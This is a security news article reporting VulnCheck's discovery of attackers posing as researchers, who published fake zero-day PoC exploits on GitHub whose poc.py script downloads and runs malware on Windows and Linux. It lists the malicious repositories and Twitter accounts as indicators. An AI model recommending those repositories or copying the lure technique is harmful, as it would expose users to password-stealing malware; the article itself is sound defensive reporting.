Hackers Post Fake PoC Exploits on GitHub to Distribute Malware

fake PoC exploits on GitHub
Written by Emma Davis

The attackers pretend to be security researchers on Twitter and on GitHub, publishing fake PoC exploits for various zero-day vulnerabilities in the public domain. In fact, under the guise of exploits, hackers distribute malware that infects machines running Windows and Linux.

The experts from VulnCheck were the first to notice this malicious campaign. According to them, the attackers have been active since May 2023 and are actively promoting fake exploits for vulnerabilities in Chrome, Discord, Signal, WhatsApp and Microsoft Exchange online.

fake PoC exploits on GitHub
Malicious repository

Let me remind you that we also wrote that Miners abuse GitHub infrastructure, and also that Many Repositories on GitHub Are Cloned and Distribute Malware.

And also information security specialists pointed out that Attackers Can Use GitHub Codespaces to Host and Deliver Malware.

The fakes are spread on behalf of the defunct security company High Sierra Cyber Security and are actively promoted on Twitter so that researchers and vulnerability analysis firms are interested in them.

The hacker’s repositories seem legitimate, and their maintainers pose as real experts from Rapid7 and other well-known companies, even using real photos for this.

fake PoC exploits on GitHub
Fake Profile

In all the cases studied, the attacker’s repositories contain the poc.py Python script, which acts as a malware loader for Linux and Windows. The script downloads a ZIP archive to the victim’s computer from an external URL. Depending on the operating system, the target receives either cveslinux.zip (Linux) or cveswindows.zip (Windows).

As a result, the malware is stored in the %Temp% folder on Windows or /home//.local/share on Linux, and then extracted and executed. VulnCheck notes that the Windows binary contained in the ZIP archive (cves_windows.exe) is detected by more than 60% of the scanners on VirusTotal, while the Linux binary (cves_linux) was much more subtle and was detected by only three scanners at the time of the report, but now there are more of them.

It is not yet clear what type of malware the attackers are spreading, but both executables install the TOR client, and the Windows version is sometimes found to be a password-stealing Trojan.

Although the scope and effectiveness of this campaign is unclear, VulnCheck notes that the hackers are very aggressive in creating new accounts and repositories when the old ones are discovered and deleted.

There are currently seven GitHub repositories known to be owned by these attackers:

  1. github.com/AKuzmanHSCS/Microsoft-Exchange-RCE
  2. github.com/MHadzicHSCS/Chrome-0-day
  3. github.com/GSandersonHSCS/discord-0-day-fix
  4. github.com/BAdithyaHSCS/Exchange-0-Day
  5. github.com/RShahHSCS/Discord-0-Day-Exploit
  6. github.com/DLandonHSCS/Discord-RCE
  7. github.com/SsankkarHSCS/Chromium-0-Day

In addition, the following Twitter accounts are owned by hackers:

  1. twitter.com/AKuzmanHSCS
  2. twitter.com/DLandonHSCS
  3. twitter.com/GSandersonHSCS
  4. twitter.com/MHadzicHSCS

It is worth saying that this is not the first case of targeted attacks on information security experts and not the first case when hackers distribute fake exploits (1, 2). The fact is that by attacking members of the cybersecurity community, in theory, attackers not only gain access to data on vulnerability research (which the victim can work on), but can also gain access to the network of a cybersecurity company. And this can be a real gold mine for hackers.

User Review
0 (0 votes)
Comments Rating 0 (0 reviews)

About the author

Emma Davis

I'm writer and content manager (a short time ago completed a bachelor degree in Marketing from the Gustavus Adolphus College). For now, I have a deep drive to study cyber security.

Leave a Reply


This site uses Akismet to reduce spam. Learn how your comment data is processed.